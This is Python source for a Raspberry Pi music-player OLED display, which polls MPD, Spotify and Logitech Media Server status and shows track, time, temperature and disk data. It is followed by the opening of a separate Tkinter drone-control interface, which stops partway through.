| source | python |
|---|---|
RaspDacDisplay.py
|
import Winstar_GraphicOLED
import moment
import time
import json
import logging
import subprocess
import os
from mpd import MPDClient
import pylms
from pylms import server
import telnetlib
from socket import error as socket_error
try:
import RPi.GPIO as GPIO
DISPLAY_INSTALLED = True
print("Gpio module installed")
time.sleep(5)
except:
import curses
DISPLAY_INSTALLED = False
print("Gpio module not installed")
time.sleep(5)
import queue as Queue
from threading import Thread
import signal
import sys
# import page definitions from pages.py
import pages
STARTUP_MSG = "Raspdac\nStarting"
HESITATION_TIME = 2.5 # Amount of time in seconds to hesitate before scrolling
ANIMATION_SMOOTHING = .15 # Amount of time in seconds before repainting display
COOLING_PERIOD = 15 # Default amount of time in seconds before an alert message can be redisplayed
# The Winstar display shipped with the RaspDac is capable of two lines of display
# when the 5x8 font is used. This code assumes that is what you will be using.
# The display logic would need significant rework to support a different number
# of display lines!
DISPLAY_WIDTH = 16 # the character width of the display
DISPLAY_HEIGHT = 2 # the number of lines on the display
# This is where the log file will be written
LOGFILE = '/var/log/RaspDacDisplay.log'
# LOGFILE='./log/RaspDacDisplay.log'
STATUSLOGFILE = '/var/log/RaspDacDisplayStatus.log'
# STATUSLOGFILE='./log/RaspDacDisplayStatus.log'
STATUSLOGGING = False
# Adjust this setting to localize the time display to your region
# TIMEZONE="US/Eastern"
TIME24HOUR = True
TIMEZONE = "Europe/Kiev"
# Logging level
LOGLEVEL = logging.DEBUG
# LOGLEVEL=logging.INFO
# LOGLEVEL=logging.WARNING
# LOGLEVEL=logging.CRITICAL
# Configure which music services to monitor
# For Volumio and RuneAudio MPD and SPOP should be enabled and LMS disabled
# for Max2Play if you are using the Logitech Music Service, then LMS should be enabled
MPD_ENABLED = True
MPD_SERVER = "localhost"
MPD_PORT = 6600
SPOP_ENABLED = False
SPOP_SERVER = "localhost"
SPOP_PORT = 6602
LMS_ENABLED = False
LMS_SERVER = "localhost"
LMS_PORT = 9090
LMS_USER = ""
LMS_PASSWORD = ""
# Set this to the MAC address of the player you want to monitor.
# This should be the MAC of the RaspDac system if using Max2Play with SqueezePlayer.
# Note: if you have another Logitech Media Server running on your network, it is entirely
# possible that your player has decided to join it instead of the LMS on Max2Play.
# To fix this, go to the SqueezeServer interface and move the player to the
# correct server.
LMS_PLAYER = "00:01:02:aa:bb:cc"
# If you are using RuneAudio you can pull the information from the REDIS database that RuneAudio maintains
# RUNE_ENABLED = False
# REDIS_SERVER = "localhost"
# REDIS_PORT = 6379
# REDIS_PASSWORD = ""
class RaspDac_Display:
def __init__(self):
logging.debug("RaspDac_Display Initializing")
self.tempreadexpired = 0
self.diskreadexpired = 0
self.ratereadexpired = 0
# used with Redis to try to figure out how long the song has been playing
self.timesongstarted = 0
self.currentsong = ""
self.currentelapsed = 0
self.tempc = 0.0
self.tempf = 0.0
self.avail = 0
self.availp = 0
self.rate = 0
# Initialize the connections to the music daemons. Currently supports
# MPD, SPOP (for Spotify) and LMS
ATTEMPTS = 3
# Will try to connect multiple times
if MPD_ENABLED:
for i in range(1, ATTEMPTS + 1):
self.client = MPDClient()
try:
# Connect to the MPD daemon
self.client.connect(MPD_SERVER, MPD_PORT)
break
except:
time.sleep(2)
else:
# The allotted number of attempts did not succeed in connecting
logging.warning("Unable to connect to MPD service on startup")
if SPOP_ENABLED:
# Now attempting to connect to the Spotify daemon
# This may fail if Spotify is not configured. That's ok!
for i in range(1, ATTEMPTS + 1):
try:
self.spotclient = telnetlib.Telnet(SPOP_SERVER, SPOP_PORT)
self.spotclient.read_until("\n".encode("utf-8"))
break
except:
time.sleep(2)
else:
# The allotted number of attempts did not succeed in connecting
logging.warning("Unable to connect to Spotify service on startup")
if LMS_ENABLED:
for i in range(1, ATTEMPTS + 1):
try:
# Connect to the LMS daemon
self.lmsserver = pylms.server.Server(LMS_SERVER, LMS_PORT, LMS_USER, LMS_PASSWORD)
self.lmsserver.connect()
# Find correct player
players = self.lmsserver.get_players()
for p in players:
### Need to find out how to get the MAC address from player
if p.get_ref().lower() == LMS_PLAYER.lower():
self.lmsplayer = p
break
if self.lmsplayer is None:
self.lmsplayer = self.lmsserver.get_players()[0]
if self.lmsplayer is None:
raise Exception('Could not find any LMS player')
break
except (socket_error, AttributeError, IndexError):
logging.debug("Connect attempt {0} to LMS server failed".format(i))
time.sleep(2)
else:
# The allotted number of attempts did not succeed in connecting
logging.warning("Unable to connect to LMS service on startup")
global STATUSLOGGING
if STATUSLOGGING:
try:
self.statusfile = open(STATUSLOGFILE, 'a')
except:
logging.warning("Status data logging requested but could not open {0}".format(STATUSLOGFILE))
STATUSLOGGING = False
def status_mpd(self):
# Try to get status from MPD daemon
try:
m_status = self.client.status()
m_currentsong = self.client.currentsong()
playlist_info = self.client.playlistinfo()
except:
# Attempt to reestablish connection to daemon
try:
self.client.connect(MPD_SERVER, MPD_PORT)
m_status = self.client.status()
m_currentsong = self.client.currentsong()
playlist_info = self.client.playlistinfo()
except:
logging.debug("Could not get status from MPD daemon")
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'current': 0, 'remaining': u"",
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
print("mpd status:", m_status)
state = m_status.get('state')
if state == "play":
artist = m_currentsong.get('artist')
name = m_currentsong.get('name')
# Trying to have something to display. If artist is empty, try the
# name field instead.
if artist is None:
artist = name
title = m_currentsong.get('title')
album = m_currentsong.get('album')
playlist_position = int(m_status.get('song')) + 1
playlist_count = int(m_status.get('playlistlength'))
volume = int(m_status.get('volume', 0))
# MPD's rate data changes continuously.
# To prevent the screen from refreshing unnecessarily, limit updates to every 20 seconds
if self.ratereadexpired < time.time():
self.ratereadexpired = time.time() + 20
self.bitrate = "{0} kbps".format(m_status.get('bitrate'))
try:
audio = m_status['audio'].split(':')
if len(audio) == 3:
sample = round(float(audio[0]) / 1000, 1)
bits = audio[1]
if audio[2] == '1':
channels = 'Mono'
elif audio[2] == '2':
channels = 'Stereo'
elif int(audio[2]) > 2:
channels = 'Multi'
else:
channels = u""
if channels == u"":
tracktype = "{0} bit, {1} kHz".format(bits, sample)
else:
tracktype = "{0}, {1} bit, {2} kHz".format(channels, bits, sample)
else:
# If audio information not available just send that MPD is the source
tracktype = u"MPD"
except KeyError:
tracktype = u""
(current, duration) = (m_status.get('time').split(":"))
# since we are returning the info as a JSON formatted return, convert
# any None's into reasonable values
if artist is None: artist = u""
if title is None: title = u""
if album is None: album = u""
if current is None: current = 0
if volume is None: volume = 0
if self.bitrate is None: self.bitrate = u""
if tracktype is None: tracktype = u""
if duration is None: duration = 0
# if duration is not available, then suppress its display
if int(duration) > 0:
timepos = time.strftime("%M:%S", time.gmtime(int(current))) + "/" + time.strftime("%M:%S", time.gmtime(
int(duration)))
remaining = time.strftime("%M:%S", time.gmtime(int(duration) - int(current)))
else:
timepos = time.strftime("%M:%S", time.gmtime(int(current)))
remaining = timepos
# If playlist is length 1 and the song playing is from an http source it is streaming
if playlist_count == 1:
if playlist_info[0]['file'][:4] == "http":
playlist_display = "Streaming"
else:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
else:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
return {'state': u"play", 'artist': artist, 'title': title, 'album': album, 'remaining': remaining,
'current': current, 'duration': duration, 'position': timepos, 'volume': volume,
'playlist_display': playlist_display, 'playlist_position': playlist_position,
'playlist_count': playlist_count, 'bitrate': self.bitrate, 'type': tracktype}
else:
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': u"",
'playlist_count': 0, 'bitrate': u"", 'type': u""}
def status_spop(self):
# Try to get status from SPOP daemon
try:
self.spotclient.write("status\n".encode("utf-8"))
spot_status_string = self.spotclient.read_until("}".encode("utf-8")).strip()
except:
# Try to reestablish connection to daemon
try:
self.spotclient = telnetlib.Telnet(SPOP_SERVER, SPOP_PORT)
self.spotclient.read_until("\n".encode("utf-8"))
self.spotclient.write("status\n".encode("utf-8"))
spot_status_string = self.spotclient.read_until("}".encode("utf-8")).strip()
except:
logging.debug("Could not get status from SPOP daemon")
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'current': 0, 'remaining': u"",
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
spot_status = json.loads(spot_status_string)
if spot_status.get('status') == "playing":
artist = spot_status.get('artist')
title = spot_status.get('title')
album = spot_status.get('album')
current = spot_status.get('position')
duration = spot_status.get('duration')
playlist_position = spot_status.get('current_track')
playlist_count = spot_status.get('total_tracks')
# SPOP doesn't seem to have bitrate, track type, or volume available
bitrate = u""
tracktype = u""
volume = 0
# since we are returning the info as a JSON formatted return, convert
# any None's into reasonable values
if artist is None: artist = u""
if title is None: title = u""
if album is None: album = u""
if current is None: current = 0
if volume is None: volume = 0
if bitrate is None: bitrate = u""
if tracktype is None: tracktype = u""
if duration is None:
duration = 0
else:
# The spotify client returns time in 1000's of a second
# Need to adjust to seconds to be consistent with MPD
duration = duration / 1000
# if duration is not available, then suppress its display
if int(duration) > 0:
timepos = time.strftime("%M:%S", time.gmtime(int(current))) + "/" + time.strftime("%M:%S", time.gmtime(
int(duration)))
remaining = time.strftime("%M:%S", time.gmtime(int(duration) - int(current)))
else:
timepos = time.strftime("%M:%S", time.gmtime(int(current)))
remaining = timepos
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
return {'state': u"play", 'artist': artist, 'title': title, 'album': album, 'remaining': remaining,
'current': current, 'duration': duration, 'position': timepos, 'volume': volume,
'playlist_display': playlist_display, 'playlist_position': playlist_position,
'playlist_count': playlist_count, 'bitrate': bitrate, 'type': tracktype}
else:
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
def status_lms(self):
# Try to get status from LMS daemon
try:
lms_status = self.lmsplayer.get_mode()
except:
# Try to reestablish connection to daemon
try:
self.lmsserver = pylms.server.Server(LMS_SERVER, LMS_PORT, LMS_USER, LMS_PASSWORD)
self.lmsserver.connect()
# Find correct player
players = self.lmsserver.get_players()
for p in players:
### Need to find out how to get the MAC address from player
if p.get_ref().lower() == LMS_PLAYER.lower():
self.lmsplayer = p
break
if self.lmsplayer is None:
self.lmsplayer = self.lmsserver.get_players()[0]
if self.lmsplayer is None:
raise Exception('Could not find any LMS player')
lms_status = self.lmsplayer.get_mode()
except (socket_error, AttributeError, IndexError):
logging.debug("Could not get status from LMS daemon")
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u"", 'current_time': u""}
if lms_status == "play":
import urllib
artist = urllib.unquote(str(self.lmsplayer.request("artist ?", True))).decode('utf-8')
title = urllib.unquote(str(self.lmsplayer.request("title ?", True))).decode('utf-8')
album = urllib.unquote(str(self.lmsplayer.request("album ?", True))).decode('utf-8')
playlist_position = int(self.lmsplayer.request("playlist index ?")) + 1
playlist_count = self.lmsplayer.playlist_track_count()
volume = self.lmsplayer.get_volume()
current = self.lmsplayer.get_time_elapsed()
duration = self.lmsplayer.get_track_duration()
url = self.lmsplayer.get_track_path()
# Get bitrate and tracktype if they are available. Try blocks used to prevent array out of bounds exception if values are not found
try:
bitrate = \
urllib.unquote(str(self.lmsplayer.request("songinfo 2 1 url:" + url + " tags:r", True))).decode(
'utf-8').split("bitrate:", 1)[1]
except:
bitrate = u""
try:
tracktype = \
urllib.unquote(str(self.lmsplayer.request("songinfo 2 1 url:" + url + " tags:o", True))).decode(
'utf-8').split("type:", 1)[1]
except:
tracktype = u""
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
# If the track count is greater than 1, we are playing from a playlist and can display track position and track count
if self.lmsplayer.playlist_track_count() > 1:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
# if the track count is exactly 1, this is either a short playlist or it is streaming
elif self.lmsplayer.playlist_track_count() == 1:
try:
# if streaming
if self.lmsplayer.playlist_get_info()[0]['duration'] == 0.0:
playlist_display = "Streaming"
# it really is a short playlist
else:
playlist_display = "{0}/{1}".format(playlist_position, playlist_count)
except KeyError:
logging.debug("In LMS couldn't get valid track information")
playlist_display = u""
else:
logging.debug("In LMS track length is <= 0")
playlist_display = u""
# since we are returning the info as a JSON formatted return, convert
# any None's into reasonable values
if artist is None: artist = u""
if title is None: title = u""
if album is None: album = u""
if current is None: current = 0
if volume is None: volume = 0
if bitrate is None: bitrate = u""
if tracktype is None: tracktype = u""
if duration is None: duration = 0
# if duration is not available, then suppress its display
if int(duration) > 0:
timepos = time.strftime("%M:%S", time.gmtime(int(current))) + "/" + time.strftime("%M:%S", time.gmtime(
int(duration)))
remaining = time.strftime("%M:%S", time.gmtime(int(duration) - int(current)))
else:
timepos = time.strftime("%M:%S", time.gmtime(int(current)))
remaining = timepos
return {'state': u"play", 'artist': artist, 'title': title, 'album': album, 'remaining': remaining,
'current': current, 'duration': duration, 'position': timepos, 'volume': volume,
'playlist_display': playlist_display, 'playlist_position': playlist_position,
'playlist_count': playlist_count, 'bitrate': bitrate, 'type': tracktype}
else:
return {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
def status(self):
# Poll the enabled music services in priority order (MPD, then SPOP, then LMS)
if MPD_ENABLED or SPOP_ENABLED or LMS_ENABLED:
if MPD_ENABLED:
# Try MPD daemon
status = self.status_mpd()
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
# If MPD is stopped
if status.get('state') != "play":
# Try SPOP
if SPOP_ENABLED:
status = self.status_spop()
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"",
'current': 0, 'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"",
'playlist_position': 0, 'playlist_count': 0, 'bitrate': u"", 'type': u""}
# If SPOP is stopped
if status.get('state') != "play":
# Try LMS
if LMS_ENABLED:
status = self.status_lms()
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"",
'current': 0, 'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"",
'playlist_position': 0, 'playlist_count': 0, 'bitrate': u"", 'type': u""}
else:
status = {'state': u"stop", 'artist': u"", 'title': u"", 'album': u"", 'remaining': u"", 'current': 0,
'duration': 0, 'position': u"", 'volume': 0, 'playlist_display': u"", 'playlist_position': 0,
'playlist_count': 0, 'bitrate': u"", 'type': u""}
# Add system variables
try:
if TIME24HOUR == True:
current_time = moment.utcnow().timezone(TIMEZONE).strftime("%H:%M").strip()
current_time_sec = moment.utcnow().timezone(TIMEZONE).strftime("%H:%M:%S").strip()
else:
current_time = moment.utcnow().timezone(TIMEZONE).strftime("%-I:%M %p").strip()
current_time_sec = moment.utcnow().timezone(TIMEZONE).strftime("%-I:%M:%S %p").strip()
except ValueError:
# Don't know why but on exit, the moment code is occasionally throwing a ValueError
current_time = "00:00"
current_time_sec = "00:00:00"
current_ip = subprocess.getoutput("ip -4 route get 1 | head -1 | cut -d' ' -f7 | tr -d '\n'").strip()
# Read Temperature from Pi's on-board temperature sensor once every 20 seconds
if self.tempreadexpired < time.time():
self.tempreadexpired = time.time() + 20
try:
file = open("/sys/class/thermal/thermal_zone0/temp")
self.tempc = int(file.read())
# Convert value to float and correct decimal place
self.tempc = round(float(self.tempc) / 1000, 1)
# convert to fahrenheit
self.tempf = round(self.tempc * 9 / 5 + 32, 1)
file.close()
except IOError:
self.tempc = 0.0
self.tempf = 0.0
except AttributeError:
file.close()
self.tempc = 0.0
self.tempf = 0.0
# Read available disk space remaining every 20 seconds
if self.diskreadexpired < time.time():
self.diskreadexpired = time.time() + 20
try:
# Check if running on OSX. If yes, adjust df command
if sys.platform == "darwin":
p = os.popen("df /")
line = p.readline()
line = p.readline()
va = line.split()
line = "{0} {1}".format(va[3], va[4])
else:
# assume running on Raspberry linux
p = os.popen("df --output='avail','pcent' /")
line = p.readline()
line = p.readline().strip()
va = line.split()
self.avail = va[0]
self.availp = va[1]
# remove % sign
self.availp = self.availp[0:len(self.availp) - 1]
self.avail = int(self.avail)
self.availp = int(self.availp)
p.close()
except IOError:
self.avail = 0
self.availp = 0
except AttributeError:
p.close()
self.avail = 0
self.availp = 0
status['current_tempc'] = self.tempc
status['current_tempf'] = self.tempf
status['disk_avail'] = self.avail
status['disk_availp'] = self.availp
status['current_time'] = current_time
status['current_time_sec'] = current_time_sec
status['current_ip'] = current_ip
# if logging of the status data has been requested record the current status
if STATUSLOGGING:
self.statusfile.write(str(status) + '\n')
self.statusfile.flush()
return status
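# Display worker: runs in its own thread, pulls line updates off the queue and scrolls any line wider than the display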
def Display(q, l, c):
# q - Queue to receive updates from
# l - number of lines in display
# c - number of columns in display
lines = []
columns = []
lcd = Winstar_GraphicOLED.Winstar_GraphicOLED()
lcd.oledReset()
lcd.home()
lcd.clear()
lcd.message(STARTUP_MSG)
time.sleep(2)
for i in range(0, l):
lines.append("")
columns.append(0)
# Get first display update off of the queue
item = q.get()
q.task_done()
lcd.home()
lcd.clear()
for i in range(len(item)):
# Convert from Unicode to UTF-8
lines[i] = item[i]
lcd.setCursor(0, i)
lcd.message(lines[i][0:c])
prev_time = time.time()
while True:
short_lines = True
# Smooth animation
if time.time() - prev_time < ANIMATION_SMOOTHING:
time.sleep(ANIMATION_SMOOTHING - (time.time() - prev_time))
try:
# Determine if any lines have been updated and if yes display them
for i in range(len(item)):
# Convert from Unicode into UTF-8
# item[i] = item[i].encode("utf-8")
# Check if line is longer than display
if len(item[i]) > c:
short_lines = False
# Check if line has been updated
if lines[i] != item[i]:
# Create a line to print that is at least as long as the existing line
# This is to erase any extraneous characters on the display
buf = item[i].ljust(len(lines[i]))
# Reset cursor to beginning of changed line and then display the change
lcd.setCursor(0, i)
lcd.message(buf[0:c])
# Update the local line data and reset the column position for the line
lines[i] = item[i]
columns[i] = 0
# If lines all fit on display then we can wait for new input
if short_lines:
item = q.get()
q.task_done()
else:
# Update all long lines
for i in range(len(lines)):
if len(lines[i]) > c:
buf = "%s %s" % (lines[i], lines[i][0:DISPLAY_WIDTH - 1])
# buf = "{} {}".format(lines[i],lines[i][0:DISPLAY_WIDTH-1])
# buf = lines[i]+" "+lines[i][0:c]
columns[i] = columns[i] + 1
if columns[i] > len(buf) - c:
columns[i] = 0
lcd.setCursor(0, i)
# Print the portion of the string that is currently visible
lcd.message(buf[columns[i]:columns[i] + c])
# Since we have to continue updating the display, check for a new update but don't block
item = q.get_nowait()
q.task_done()
prev_time = time.time()
except Queue.Empty:
prev_time = time.time()
pass
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGTERM, sigterm_handler)
try:
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename=LOGFILE, level=LOGLEVEL)
except IOError:
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename="RaspDacDisplay.log",
level=LOGLEVEL)
# As cstatus will get referenced inside of handleuncaughtexceptions, make sure it has a valid value
cstatus = {}
# Move unhandled exception messages to log file
def handleuncaughtexceptions(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logging.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
if len(cstatus) > 0:
logging.error("Player status at exception")
logging.error(str(cstatus))
sys.__excepthook__(exc_type, exc_value, exc_traceback)
sys.excepthook = handleuncaughtexceptions
logging.info("Raspdac display starting...")
# Suppress MPD libraries INFO messages
loggingMPD = logging.getLogger("mpd")
loggingMPD.setLevel(logging.WARN)
try:
dq = Queue.Queue() # Create display Queue
dm = Thread(target=Display, args=(dq, DISPLAY_HEIGHT, DISPLAY_WIDTH))
dm.setDaemon(True)
dm.start()
rd = RaspDac_Display()
except:
# e = sys.exc_info()[0]
# logging.critical("Received exception: %s" % e)
# e = sys.exc_info()[0]
logging.critical("Unable to initialize RaspDac Display. Exiting...")
logging.critical("Exception", exc_info=(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]))
if DISPLAY_INSTALLED:
GPIO.cleanup()
else:
curses.endwin()
sys.exit(0)
try:
current_page_number = -1
current_line_number = 0
page_expires = 0
hesitation_expires = 0
curlines = []
hesitate_expires = []
alert_mode = False
# Reset all of the alert message cooling values
for pl in pages.ALERT_LIST:
pl['cooling_expires'] = 0
# Initialize previous state
prev_state = rd.status()
# Force the system to recognize the start state as a change
prev_state['state'] = ""
while True:
# Get current state of the player
cstatus = rd.status()
state = cstatus.get('state')
alert_check = False
# Check to see if any alerts are triggered
for pl in pages.ALERT_LIST:
# Check to see if alert is in its cooling period
if pl['cooling_expires'] < time.time():
# Use try block to skip page if variables are missing
try:
# Check to see what type of monitoring to perform
if pl['alert']['type'] == "change":
if cstatus[pl['alert']['variable']] != prev_state[pl['alert']['variable']]:
prev_state[pl['alert']['variable']] = cstatus[pl['alert']['variable']]
# Some state changes cause variable changes like volume
# Check to see if these dependent variable changes
# should be suppressed
try:
if prev_state['state'] == state or not pl['alert']['suppressonstatechange']:
alert_check = True
except KeyError:
pass
elif pl['alert']['type'] == "above":
if cstatus[pl['alert']['variable']] > pl['alert']['values'][0]:
alert_check = True
elif pl['alert']['type'] == "below":
if cstatus[pl['alert']['variable']] < pl['alert']['values'][0]:
alert_check = True
elif pl['alert']['type'] == "range":
if cstatus[pl['alert']['variable']] > pl['alert']['values'][0] and cstatus[
pl['alert']['variable']] < pl['alert']['values'][1]:
alert_check = True
if alert_check:
alert_mode = True
# Set current_pages to the alert page
current_pages = pl
current_page_number = 0
current_line_number = 0
page_expires = time.time() + current_pages['pages'][current_page_number]['duration']
curlines = []
hesitate_expires = []
# Set cooling expiry time. If not coolingperiod directive, use default
try:
pl['cooling_expires'] = time.time() + pl['alert']['coolingperiod']
except KeyError:
pl['cooling_expires'] = time.time() + COOLING_PERIOD
# if an alert has been found, break out of the loop
# this has the effect of making the order of the list the priority of the messages
break
except (KeyError, AttributeError, IndexError):
pass
# Set interruptible value. If value not present, set to default value of True
try:
# interruptible is only an override until the page expires. If page expires, allow page updates to continue.
if page_expires < time.time():
interruptible = True
# if page just expired on an alert page then force restore to current play state
if alert_mode:
alert_mode = False
prev_state['state'] = ""
else:
interruptible = current_pages['interruptible']
except KeyError:
interruptible = True
# check to see if we need to change the display to something new
if (alert_mode or state != prev_state['state']) and interruptible:
current_page_number = -1
current_line_number = 0
page_expires = 0
curlines = []
hesitate_expires = []
# if change caused by state change and not alert
if alert_mode == False:
prev_state['state'] = state
# Set to new display page
if state != "play":
current_pages = pages.PAGES_Stop
# else display the PAGES_Playing pages
else:
current_pages = pages.PAGES_Play
# if page has expired then move to the next page
if page_expires < time.time():
# Move to next page and check to see if it should be displayed or hidden
for i in range(len(current_pages['pages'])):
current_page_number = current_page_number + 1
# if on last page, return to first page
if current_page_number > len(current_pages['pages']) - 1:
current_page_number = 0
page_expires = time.time() + current_pages['pages'][current_page_number]['duration']
cp = current_pages['pages'][current_page_number]
try:
hwe = cp['hidewhenempty']
except KeyError:
hwe = 'False'
try:
hwp = cp['hidewhenpresent']
except:
hwp = 'False'
# to prevent old pages format from causing problems, convert values to strings
if type(hwe) is bool:
hwe = str(hwe)
if type(hwp) is bool:
hwp = str(hwp)
if hwe.lower() == 'all' or hwe.lower() == 'true':
allempty = True
try:
hvars = cp['hidewhenemptyvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is not empty, then set allempty False and exit loop
if len(cstatus[v]) > 0:
allempty = False
break
elif type(cstatus[v]) is int:
if not cstatus[v] == 0:
allempty = False
break
else:
# All other variable types are considered not empty
allempty = False
break
except KeyError:
# if the variable is not in cstatus consider it empty
pass
if not allempty:
break
elif hwe.lower() == 'any':
anyempty = False
try:
hvars = cp['hidewhenemptyvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is empty, then set anyempty True and exit loop
if len(cstatus[v]) == 0:
anyempty = True
break
# if the value is 0 consider it empty
elif type(cstatus[v]) is int:
if cstatus[v] == 0:
anyempty = True
break
except KeyError:
# if the variable is not in cstatus consider it empty
anyempty = True
break
if not anyempty:
break
elif hwp.lower() == 'any':
anypresent = False
try:
hvars = cp['hidewhenpresentvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is present, then set anypresent True and exit loop
if len(cstatus[v]) > 0:
anypresent = True
break
elif type(cstatus[v]) is int:
if not cstatus[v] == 0:
anypresent = True
break
# if it is not a string, and not zero consider it present
else:
anypresent = True
break
except KeyError:
# if the variable is not in cstatus consider it empty
break
if not anypresent:
break
elif hwp.lower() == 'all' or hwp.lower() == 'true':
allpresent = True
try:
hvars = cp['hidewhenemptyvars']
except KeyError:
hvars = []
for v in hvars:
try:
# if the variable is a string
if type(cstatus[v]) is str:
# and it is not present, then set allpresent False and exit loop
if len(cstatus[v]) == 0:
allpresent = False
break
elif type(cstatus[v]) is int:
if cstatus[v] == 0:
allpresent = False
break
except KeyError:
# if the variable is not in cstatus consider it empty
allpresent = False
break
if not allpresent:
break
else:
# If not hidewhenempty or hidewhenpresent then exit loop
break
# Set current_page
current_page = current_pages['pages'][current_page_number]
# Now display the lines from the current page
lines = []
for i in range(len(current_page['lines'])):
# make sure curlines is big enough. curlines is used to detect when the display has changed
# if not expanded here it will cause an IndexError later if it has not already been initialized
while len(curlines) < len(current_page['lines']):
curlines.append("")
# make sure hesitate_expires is big enough as well
while len(hesitate_expires) < len(current_page['lines']):
hesitate_expires.append(0)
current_line = current_page['lines'][i]
try:
justification = current_line['justification']
except KeyError:
justification = "left"
try:
scroll = current_line['scroll']
except KeyError:
scroll = False
try:
variables = current_line['variables']
except KeyError:
variables = []
# If you have specified a strftime format on the line
# now use it to add a formatted time to cstatus
try:
strftime = current_line['strftime']
except:
# Use 12 hour clock as default
strftime = "%-I:%M %p"
cstatus['current_time_formatted'] = moment.utcnow().timezone(TIMEZONE).strftime(strftime).strip()
format = current_line['format']
# Get parameters
# ignore KeyError exceptions if a variable is unavailable
parms = []
try:
for j in range(len(current_line['variables'])):
try:
parms.append(cstatus[current_line['variables'][j]])
# if type(cstatus[current_line['variables'][j]]) is str:
# parms.append(cstatus[current_line['variables'][j]].encode('utf-8'))
# else:
# parms.append(cstatus[current_line['variables'][j]])
except KeyError:
pass
except KeyError:
pass
# create line to display
line = format.format(*parms)#.decode('utf-8')
# justify line
try:
if current_line['justification'] == "center":
line = "{0:^{1}}".format(line, DISPLAY_WIDTH)
elif current_line['justification'] == "right":
line = "{0:>{1}}".format(line, DISPLAY_WIDTH)
except KeyError:
pass
lines.append(line)
# determine whether to scroll or not
# if scroll is false, set hesitation time to large value which
# effectively shuts off the scroll function
if lines[i] != curlines[i]:
curlines[i] = lines[i]
try:
if current_line['scroll']:
hesitate_expires[i] = time.time() + HESITATION_TIME
else:
hesitate_expires[i] = time.time() + 86400 # Do not scroll
except KeyError:
hesitate_expires[i] = time.time() + 86400 # Do not scroll
# Determine if the display should hesitate before scrolling
dispval = []
for i in range(len(lines)):
if hesitate_expires[i] < time.time():
dispval.append(lines[i])
else:
dispval.append(lines[i][0:DISPLAY_WIDTH])
# Send dispval to the queue
dq.put(dispval)
# sleep before next update
time.sleep(.25)
except KeyboardInterrupt:
pass
finally:
dq.put(["Goodbye!", ""])
logging.info("Raspdac display shutting down")
try:
rd.client.disconnect()
except:
pass
try:
rd.spotclient.write("bye\n")
rd.spotclient.close()
except:
pass
if STATUSLOGGING:
rd.statusfile.close()
time.sleep(2)
dq.put(["", ""])
time.sleep(1)
if DISPLAY_INSTALLED:
GPIO.cleanup()
else:
curses.endwin()
|
drone_control_ui.py
|
# This module builds the UI with Tkinter and glues together several components.
import sys
import numpy as np
from PIL import Image
from PIL import ImageTk
import Tkinter as tki
from Tkinter import Toplevel, Scale
import threading
import pytz
import datetime
import cv2
import os
import time
from drone_ar_flight import Drone_AR_Flight
import platform
TIMEZONE = 'Asia/Tokyo'
class DroneUI:
def __init__(self,drone,outputpath):
self.drone = drone
self.ar_cmd = 'MANUAL'
self.ar_val = 0
self.auto_pilot = False
self.takeoff = False
self.distance = 20
self.degree = 10
self.FRAME_W = 960
self.FRAME_H = 720
self.now_battery = int(0)
self.now_height = int(0)
self.drone_ar = Drone_AR_Flight()
self.frame_no = 0
self.frame_lock = threading.Lock()
self.blank_frame = np.zeros((self.FRAME_H, self.FRAME_W, 3), np.uint8)
self.frame = self.blank_frame
self.root = tki.Tk()
self.image = Image.fromarray(self.frame)
self.image = ImageTk.PhotoImage(self.image)
self.panel = tki.Label(image=self.image)
self.panel.image = self.image
self.panel.pack(side="left", padx=10, pady=10)
self.text1 = tki.Label(self.root, text=
'W - Up\t\tArrow U - Forward\n'
'S - Down\t\tArrow D - Backward\n'
'A - Rotate Left\tArrow L - Left\n'
'D - Rotate Right\tArrow R - Right\n',
justify="left")
self.text1.pack(side="top")
